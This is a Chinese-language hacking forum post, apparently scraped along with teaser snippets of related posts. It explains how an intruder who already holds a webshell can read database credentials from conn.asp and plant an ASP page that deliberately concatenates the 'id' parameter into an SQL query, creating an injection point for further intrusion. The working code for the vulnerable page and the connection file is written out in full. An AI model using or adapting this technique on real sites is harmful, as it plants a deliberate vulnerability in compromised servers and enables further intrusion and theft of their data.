自己構造注入點方便入侵
今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊
這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!
首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和
因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,**如下:
程式**
<%
set rs=server.createobject(「adodb.recordset」)
id = request(「id」)
strsql = 「select * from admin where id=」 & id
rs.open strsql,conn,1,3
rs.close
%>
把strsql = 「select * from admin where id=」 & id 這句話裡面的admin換成要偽造的表名,注意必須存在
你可以連線上去看下表名就是了!這裡假設的是admin是表名!這個檔名隨便儲存!
然後就要構造乙個連線資料庫的檔案了,**如下:
程式**
<%
strsqlservername = 「000.000.000.000」 '伺服器名稱或位址
strsqldbusername = 「sqlname」 '資料庫帳號
strsqldbpassword = 「sqlpass」 '資料庫密碼
strsqldbname = 「sqldataname」 '資料庫名稱
set conn = server.createobject(「adodb.connection」)
strcon = 「provider=sqloledb.1;persist security info=false;server=」 & strsqlservername & 「;user id=」 & strsqldbusername & 「;password=」 & strsqldbpassword & 「;database=」 & strsqldbname & 「;」
conn.open strcon
%>
這裡應該都會了,就不羅嗦了,不過注意的是儲存的檔名要和include呼叫的名字一樣。。還是羅嗦話,
就這樣,正常情況下,就ok了,偽造成功⋯⋯
如果有什麼問題可以提出來大家一起**解決。
自己構造注入點方便入侵
首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和 因為我測試的時候是用管理員的表,我朋友說任何表名都可以,只要這個表存在,如下 程式 set rs server.createobject adodb.recordset id r...
自己構造注入點
一種是通過conn.asp獲知資料庫帳戶密碼以後 自己構造,另乙個是通過搜尋檢視源 構造注入點。第一種 適用條件 已經獲得 的資料庫鏈結檔案,但不是sa許可權 當然如果是mdb資料庫那就很簡單了,直接下下來就ok了,這裡只是針對mssql資料庫而言 由於入侵 並沒有注入漏洞所以,無法注入,但是我們可...
自己偽造注入點方便滲透
今天看了rootkit論壇裡面有人要我寫出來關於偽造乙個注入點,然後方便滲透,找到更多的可利用的資訊 這兩天一直考試,想了下,就先仍出來,有什麼問題可以提出來,我們一起討論!首先你要拿了乙個webshell,這樣你找到連線資料庫的檔案,大多都是conn.asp這個檔案裡面有mssql的使用者和 密碼...